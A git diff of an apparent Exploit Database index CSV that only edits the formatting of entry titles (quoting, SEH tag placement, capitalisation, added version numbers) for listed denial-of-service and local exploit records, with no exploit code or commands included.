diff --git a/files.csv b/files.csv index 37f9626c8..6dffef49d 100644 --- a/files.csv +++ b/files.csv @@ -438,7 +438,7 @@ id,file,description,date,author,platform,type,port 2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service",2006-12-13,shinnai,windows,dos,0 2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - 'mod_ctrls support' Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0 2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - (DLL-load Hijacking) Code Execution (PoC)",2006-12-14,"Aviv Raff",windows,dos,0 -2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service",2006-12-15,rgod,windows,dos,0 +2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - 'SIZE' Remote Denial of Service",2006-12-15,rgod,windows,dos,0 2935,platforms/windows/dos/2935.sh,"Microsoft Windows Media Player 9/10 - '.mid' Denial of Service",2006-12-15,sehato,windows,dos,0 2942,platforms/windows/dos/2942.py,"Star FTP Server 1.10 - (RETR) Remote Denial of Service",2006-12-17,Necro,windows,dos,0 2946,platforms/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control - 'ole32.dll' Denial of Service",2006-12-18,shinnai,windows,dos,0 @@ -736,7 +736,7 @@ id,file,description,date,author,platform,type,port 5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - '.PDF' Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0 5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)",2008-05-31,securfrog,windows,dos,0 -5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0 +5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0 5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0 5727,platforms/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0 5749,platforms/multiple/dos/5749.pl,"Asterisk 1.2.x - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0 @@ -846,9 +846,9 @@ id,file,description,date,author,platform,type,port 6838,platforms/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service (Metasploit)",2008-10-25,"Saint Patrick",windows,dos,0 6863,platforms/windows/dos/6863.pl,"PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service",2008-10-29,"Jeremy Brown",windows,dos,0 6926,platforms/windows/dos/6926.pl,"FTP Now 2.6 Server - Response Remote Crash (PoC)",2008-11-01,DeltahackingTEAM,windows,dos,0 -7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router (xslt) - Denial of Service",2008-11-08,hkm,hardware,dos,0 +7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router - 'xslt' Denial of Service",2008-11-08,hkm,hardware,dos,0 7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 (OSX) - Multiple Buffer Overflow Vulnerabilities (PoC)",2008-11-11,xwings,osx,dos,0 -7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - (URL Protocol) Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,windows,dos,0 +7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - 'URL Protocol' Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,windows,dos,0 7091,platforms/linux/dos/7091.c,"Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic Exploit",2008-11-11,"Andrea Bittau",linux,dos,0 7099,platforms/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 - 'Community' Remote Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",windows,dos,0 7100,platforms/linux/dos/7100.pl,"Net-SNMP 5.1.4/5.2.4/5.4.1 Perl Module - Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",linux,dos,0 @@ -1459,7 +1459,7 @@ id,file,description,date,author,platform,type,port 11966,platforms/windows/dos/11966.py,"Easy Icon Maker - '.ico' File Reading Crash",2010-03-30,ITSecTeam,windows,dos,0 11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - '.wav' (PoC)",2010-03-30,"Richard leahy",windows,dos,0 11977,platforms/windows/dos/11977.pl,"CDTrustee - '.BAK' Local Crash (PoC)",2010-03-31,anonymous,windows,dos,0 -11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' File (SEH) (PoC)",2010-03-31,TecR0c,windows,dos,0 +11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' File Exploit (SEH) (PoC)",2010-03-31,TecR0c,windows,dos,0 11985,platforms/windows/dos/11985.sh,"BitComet 1.19 - Remote Denial of Service",2010-03-31,"Pierre Nogues",windows,dos,0 11987,platforms/windows/dos/11987.txt,"Adobe Reader - Escape From '.PDF'",2010-03-31,"Didier Stevens",windows,dos,0 12000,platforms/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - '.mdb' Crash (PoC)",2010-04-01,anonymous,windows,dos,0 @@ -1602,7 +1602,7 @@ id,file,description,date,author,platform,type,port 13939,platforms/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)",2010-06-19,gunslinger_,windows,dos,0 13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,windows,dos,0 13959,platforms/windows/dos/13959.c,"TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 -13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - (SEH) (PoC)",2010-06-22,blake,windows,dos,0 +13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - Exploit (SEH) (PoC)",2010-06-22,blake,windows,dos,0 14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel - 'mountnfs()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0 14010,platforms/novell/dos/14010.txt,"Novell iManager - Multiple Vulnerabilities",2010-06-24,"Core Security Technologies",novell,dos,48080 14012,platforms/multiple/dos/14012.txt,"Weborf HTTP Server - Denial of Service",2010-06-24,Crash,multiple,dos,80 @@ -1702,7 +1702,7 @@ id,file,description,date,author,platform,type,port 14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service",2010-09-03,"Matthew Bergin",windows,dos,0 14892,platforms/windows/dos/14892.py,"VideoLAN VLC Media Player < 1.1.4 - '.xspf' 'smb://' URI Handling Remote Stack Overflow (PoC)",2010-09-04,s-dz,windows,dos,0 14904,platforms/linux/dos/14904.txt,"FCrackZip 1.0 - Local Buffer Overflow (PoC)",2010-09-05,0x6264,linux,dos,0 -14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - Buffer Overflow (SEH) Crash (PoC)",2010-09-05,"Abhishek Lyall",windows,dos,0 +14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - Buffer Overflow Crash (SEH) (PoC)",2010-09-05,"Abhishek Lyall",windows,dos,0 14916,platforms/windows/dos/14916.py,"HP OpenView Network Node Manager (OV NNM) - 'webappmon.exe' 'execvp_nc' Remote Code Execution",2010-09-06,Abysssec,windows,dos,0 14928,platforms/novell/dos/14928.py,"Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow",2010-09-07,Abysssec,novell,dos,0 14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - '.wav' Denial of Service",2010-09-07,s-dz,windows,dos,0 @@ -1971,7 +1971,7 @@ id,file,description,date,author,platform,type,port 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW - series Authentication Bypass printer flooder",2011-05-31,chrisB,hardware,dos,0 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 17363,platforms/windows/dos/17363.pl,"1ClickUnzip 3.00 - '.zip' Heap Overflow",2011-06-06,"C4SS!0 G0M3S",windows,dos,0 -17372,platforms/windows/dos/17372.txt,"VideoLAN VLC Media Player 1.1.9 - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0 +17372,platforms/windows/dos/17372.txt,"VideoLAN VLC Media Player 1.1.9 - XSPF Playlist Local File Integer Overflow",2011-06-08,TecR0c,windows,dos,0 17455,platforms/windows/dos/17455.rb,"SmallFTPd 1.0.3 - Denial of Service",2011-06-27,"Myo Soe",windows,dos,0 17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow",2011-06-11,huimaozi,windows,dos,0 17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 - Remote Crash",2011-06-14,echo,windows,dos,0 @@ -2546,7 +2546,7 @@ id,file,description,date,author,platform,type,port 20883,platforms/windows/dos/20883.txt,"Faust Informatics FreeStyle Chat 4.1 SR2 MS-DOS Device Name - Denial of Service",2001-05-25,nemesystm,windows,dos,0 20904,platforms/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,dos,0 20907,platforms/windows/dos/20907.sh,"Microsoft Windows Server 2000 - Telnet 'Username' Denial of Service",2001-06-07,"Michal Zalewski",windows,dos,0 -20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system - (SEH) Overwrite",2012-08-29,Ciph3r,windows,dos,0 +20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system - Overwrite (SEH)",2012-08-29,Ciph3r,windows,dos,0 20955,platforms/windows/dos/20955.pl,"Internet Download Manager - Memory Corruption",2012-08-31,Dark-Puzzle,windows,dos,0 20922,platforms/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 - Stack Overflow Denial of Service",2001-06-12,"Jass Seljamaa",osx,dos,0 20930,platforms/windows/dos/20930.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (PoC)",2001-06-18,Ps0,windows,dos,0 @@ -2697,7 +2697,7 @@ id,file,description,date,author,platform,type,port 21821,platforms/windows/dos/21821.c,"Trillian 0.74 - IRC PART Message Denial of Service",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 21823,platforms/windows/dos/21823.c,"Trillian 0.74 - IRC Oversized Data Block Buffer Overflow",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 21824,platforms/windows/dos/21824.pl,"Arctic Torrent 1.2.3 - Memory Corruption (Denial of Service)",2012-10-09,"Jean Pascal Pereira",windows,dos,0 -21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition - (SEH) Buffer Overflow (PoC)",2012-10-09,Dark-Puzzle,windows,dos,0 +21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition -Buffer Overflow (SEH) (PoC)",2012-10-09,Dark-Puzzle,windows,dos,0 21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch - Device Reset Denial of Service",2002-09-24,"Brook Powers",hardware,dos,0 21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - 'UNICODE' Null Pointer Dereference",2012-10-09,wh1ant,windows,dos,0 21854,platforms/linux/dos/21854.c,"Apache 2.0.39/40 - Oversized STDERR Buffer Denial of Service",2002-09-24,"K.C. Wong",linux,dos,0 @@ -3060,10 +3060,10 @@ id,file,description,date,author,platform,type,port 23540,platforms/freebsd/dos/23540.c,"KAME Racoon - 'Initial Contact' SA Deletion",2004-01-14,"Thomas Walpuski",freebsd,dos,0 23543,platforms/multiple/dos/23543.txt,"Vicomsoft RapidCache Server 2.0/2.2.6 - Host Argument Denial of Service",2004-01-15,"Peter Winter-Smith",multiple,dos,0 23556,platforms/multiple/dos/23556.txt,"GetWare Web Server Component - Content-Length Value Remote Denial of Service",2004-01-19,"Luigi Auriemma",multiple,dos,0 -23565,platforms/windows/dos/23565.txt,"Sony PC Companion 2.1 - (DownloadURLToFile()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 -23567,platforms/windows/dos/23567.txt,"Sony PC Companion 2.1 - (Load()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 -23568,platforms/windows/dos/23568.txt,"Sony PC Companion 2.1 - (CheckCompatibility()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 -23569,platforms/windows/dos/23569.txt,"Sony PC Companion 2.1 - (Admin_RemoveDirectory()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 +23565,platforms/windows/dos/23565.txt,"Sony PC Companion 2.1 - 'DownloadURLToFile()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 +23567,platforms/windows/dos/23567.txt,"Sony PC Companion 2.1 - 'Load()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 +23568,platforms/windows/dos/23568.txt,"Sony PC Companion 2.1 - 'CheckCompatibility()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 +23569,platforms/windows/dos/23569.txt,"Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 23574,platforms/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 - Null Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos,0 23584,platforms/windows/dos/23584.c,"McAfee ePolicy Orchestrator 1.x/2.x/3.0 - Agent HTTP POST Buffer Mismanagement",2004-01-22,cyber_flash,windows,dos,0 23590,platforms/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",multiple,dos,0 @@ -3082,7 +3082,7 @@ id,file,description,date,author,platform,type,port 23656,platforms/multiple/dos/23656.txt,"Oracle 9.x - Database Parameter / Statement Buffer Overflow",2003-02-05,NGSSoftware,multiple,dos,0 23660,platforms/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String",2004-02-07,shaun2k2,windows,dos,0 23662,platforms/linux/dos/23662.c,"Nadeo Game Engine - Remote Denial of Service",2004-02-09,scrap,linux,dos,0 -23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - results.stm Post Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0 +23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - 'results.stm' POST Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0 23665,platforms/windows/dos/23665.c,"Shaun2k2 Palmhttpd Server 3.0 - Remote Denial of Service",2004-02-09,shaun2k2,windows,dos,0 23667,platforms/linux/dos/23667.txt,"ClamAV Daemon 0.65 - Malformed UUEncoded Message Denial of Service",2004-02-09,"Oliver Eikemeier",linux,dos,0 23672,platforms/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Vulnerabilities",2004-02-09,"Bruno Morisson",hardware,dos,0 @@ -3549,7 +3549,7 @@ id,file,description,date,author,platform,type,port 27765,platforms/linux/dos/27765.txt,"LibTiff 3.x - Double-Free Memory Corruption",2008-04-28,"Tavis Ormandy",linux,dos,0 27856,platforms/linux/dos/27856.txt,"GNU BinUtils 2.1x - Buffer Overflow",2006-05-11,"Jesus Olmos Gonzalez",linux,dos,0 27775,platforms/hardware/dos/27775.py,"Netgear ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",hardware,dos,0 -27778,platforms/linux/dos/27778.txt,"Samba nttrans Reply - Integer Overflow",2013-08-22,x90c,linux,dos,139 +27778,platforms/linux/dos/27778.txt,"Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow",2013-08-22,x90c,linux,dos,139 27790,platforms/osx/dos/27790.txt,"Apple Mac OSX 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,osx,dos,0 27791,platforms/linux/dos/27791.txt,"Xine 0.99.x - Filename Handling Remote Format String",2006-05-01,KaDaL-X,linux,dos,0 27850,platforms/windows/dos/27850.txt,"Microsoft Infotech Storage Library - Heap Corruption",2006-05-09,"Ruben Santamarta",windows,dos,0 @@ -4432,8 +4432,8 @@ id,file,description,date,author,platform,type,port 35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,windows,dos,0 35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0 -35530,platforms/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) Denial of Service",2014-12-15,s-dz,windows,dos,0 -35531,platforms/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) Denial of Service",2014-12-15,s-dz,windows,dos,0 +35530,platforms/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) (Denial of Service)",2014-12-15,s-dz,windows,dos,0 +35531,platforms/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) (Denial of Service)",2014-12-15,s-dz,windows,dos,0 35532,platforms/windows/dos/35532.py,"jaangle 0.98i.977 - Denial of Service",2014-12-15,s-dz,windows,dos,0 35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x/4.1.x/4.2.x - Denial of Service",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0 35552,platforms/windows/dos/35552.py,"MoviePlay 4.82 - '.avi' Buffer Overflow",2011-03-31,^Xecuti0N3r,windows,dos,0 @@ -4532,7 +4532,7 @@ id,file,description,date,author,platform,type,port 36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server Denial of Service",2015-04-23,"Koorosh Ghorbani",hardware,dos,80 36840,platforms/multiple/dos/36840.py,"Wireshark 1.12.4 - Memory Corruption and Access Violation (PoC)",2015-04-27,"Avinash Thapa",multiple,dos,0 36841,platforms/windows/dos/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)",2015-04-27,"Avinash Thapa",windows,dos,0 -36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - (SEH) Overflow Crash (PoC)",2015-04-28,"Avinash Thapa",windows,dos,0 +36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - Overflow Crash (SEH) (PoC)",2015-04-28,"Avinash Thapa",windows,dos,0 36868,platforms/hardware/dos/36868.pl,"Mercury MR804 Router - Multiple HTTP Header Fields Denial of Service Vulnerabilities",2012-02-21,demonalex,hardware,dos,0 36869,platforms/multiple/dos/36869.txt,"IBM solidDB 6.5.0.8 - 'SELECT' Statement 'WHERE' Condition Denial of Service",2012-02-09,IBM,multiple,dos,0 36881,platforms/multiple/dos/36881.txt,"TestDisk 6.14 - Check_OS2MB Stack Buffer Overflow",2015-05-01,Security-Assessment.com,multiple,dos,0 @@ -4791,7 +4791,7 @@ id,file,description,date,author,platform,type,port 38556,platforms/android/dos/38556.txt,"Samsung - seiren Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0 38557,platforms/android/dos/38557.txt,"Samsung fimg2d - FIMG2D_BITBLT_BLIT ioctl Concurrency Flaw",2015-10-28,"Google Security Research",android,dos,0 38558,platforms/android/dos/38558.txt,"Samsung - SecEmailComposer QUICK_REPLY_BACKGROUND Permissions",2015-10-28,"Google Security Research",android,dos,0 -38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field (SEH) Overflow Crash (SEH) (PoC)",2015-10-29,"Luis Martínez",windows,dos,0 +38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field Overflow Crash (SEH) (PoC)",2015-10-29,"Luis Martínez",windows,dos,0 38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0 38580,platforms/windows/dos/38580.txt,"Microsoft Windows - NtCreateLowBoxToken Handle Capture Local Denial of Service / Privilege Escalation (MS15-111)",2015-10-30,"Google Security Research",windows,dos,0 38589,platforms/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0 @@ -4816,7 +4816,7 @@ id,file,description,date,author,platform,type,port 38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0 38685,platforms/linux/dos/38685.py,"TACK 1.07 - Local Stack Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,dos,0 38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field Overflow (SEH)",2015-11-12,"Nipun Jaswal",windows,dos,0 -38701,platforms/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - '.gfb' Overwrite (SEH) Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0 +38701,platforms/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - '.gfb' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,windows,dos,0 38702,platforms/windows/dos/38702.txt,"TECO TP3-PCLINK 2.1 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0 38703,platforms/windows/dos/38703.txt,"TECO AP-PCLINK 1.094 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0 38705,platforms/windows/dos/38705.py,"Sam Spade 1.14 - Browse URL Buffer Overflow (PoC)",2015-11-16,"Nipun Jaswal",windows,dos,0 @@ -5001,7 +5001,7 @@ id,file,description,date,author,platform,type,port 39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0 39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0 -39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - (SEH)Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0 +39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - Crash (SEH) (PoC)",2016-02-15,INSECT.B,windows,dos,0 39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0 39454,platforms/linux/dos/39454.txt,"glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC)",2016-02-16,"Google Security Research",linux,dos,0 39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0 @@ -5052,7 +5052,7 @@ id,file,description,date,author,platform,type,port 39551,platforms/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0 39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0 39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0 -39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - Overflow (SEH) Denial of Service",2016-03-14,INSECT.B,windows,dos,0 +39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service)",2016-03-14,INSECT.B,windows,dos,0 39560,platforms/windows/dos/39560.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39561,platforms/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39562,platforms/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0 @@ -5183,7 +5183,7 @@ id,file,description,date,author,platform,type,port 39994,platforms/windows/dos/39994.html,"Microsoft Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)",2016-06-21,Skylined,windows,dos,0 40014,platforms/hardware/dos/40014.txt,"Magnet Networks Tesley CPVA 642 Router - Weak WPA-PSK Passphrase Algorithm",2016-06-27,"Matt O'Connor",hardware,dos,0 40031,platforms/multiple/dos/40031.txt,"Symantec AntiVirus - Multiple Remote Memory Corruption Unpacking RAR",2016-06-29,"Google Security Research",multiple,dos,0 -40032,platforms/multiple/dos/40032.txt,"Symantec AntiVirus - Remote Stack Buffer Overflow in dec2lha Library",2016-06-29,"Google Security Research",multiple,dos,0 +40032,platforms/multiple/dos/40032.txt,"Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0 40034,platforms/multiple/dos/40034.txt,"Symantec AntiVirus - Heap Overflow Modifying MIME Messages",2016-06-29,"Google Security Research",multiple,dos,0 40035,platforms/multiple/dos/40035.txt,"Symantec AntiVirus - Integer Overflow in TNEF Decoder",2016-06-29,"Google Security Research",multiple,dos,0 40036,platforms/multiple/dos/40036.txt,"Symantec AntiVirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink",2016-06-29,"Google Security Research",multiple,dos,0 @@ -5550,7 +5550,7 @@ id,file,description,date,author,platform,type,port 42188,platforms/multiple/dos/42188.html,"WebKit JSC - JSGlobalObject::haveABadTime Causes Type Confusions",2017-06-16,"Google Security Research",multiple,dos,0 42189,platforms/multiple/dos/42189.html,"WebKit JSC - arrayProtoFuncSplice does not Initialize all Indices",2017-06-16,"Google Security Research",multiple,dos,0 42190,platforms/multiple/dos/42190.html,"WebKit JSC - JIT Optimization Check Failed in IntegerCheckCombiningPhase::handleBlock",2017-06-16,"Google Security Research",multiple,dos,0 -42191,platforms/multiple/dos/42191.html,"WebKit JSC - Heap Buffer Overflow in Intl.getCanonicalLocales",2017-06-16,"Google Security Research",multiple,dos,0 +42191,platforms/multiple/dos/42191.html,"WebKit JSC - 'Intl.getCanonicalLocales' Heap Buffer Overflow",2017-06-16,"Google Security Research",multiple,dos,0 42198,platforms/linux/dos/42198.txt,"GNU binutils - 'rx_decode_opcode' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0 42199,platforms/linux/dos/42199.txt,"GNU binutils - 'disassemble_bytes' Heap Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0 42200,platforms/linux/dos/42200.txt,"GNU binutils - 'bfd_get_string' Stack Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0 @@ -5672,7 +5672,7 @@ id,file,description,date,author,platform,type,port 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 15,platforms/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0 21,platforms/linux/local/21.c,"Qpopper 4.0.x - poppassd Privilege Escalation",2003-04-29,Xpl017Elz,linux,local,0 -29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE - Privilege Escalation",2003-05-12,bob,bsd,local,0 +29,platforms/bsd/local/29.c,"Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Privilege Escalation",2003-05-12,bob,bsd,local,0 31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 (Mandrake / Slackware) - Privilege Escalation",2003-05-14,anonymous,linux,local,0 32,platforms/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Buffer Overflow",2003-05-21,einstein,windows,local,0 40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 /usr/mail - Local Exploit",2003-06-10,anonymous,linux,local,0 @@ -6585,7 +6585,7 @@ id,file,description,date,author,platform,type,port 10072,platforms/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security",2009-11-12,"Marsh Ray",multiple,local,0 10076,platforms/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Privilege Escalation",2009-10-02,mu-b,osx,local,0 10078,platforms/osx/local/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local Exploit (PoC)",2009-10-02,mu-b,osx,local,0 -33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (Unicode SEH)",2014-05-19,"Mike Czumak",windows,local,0 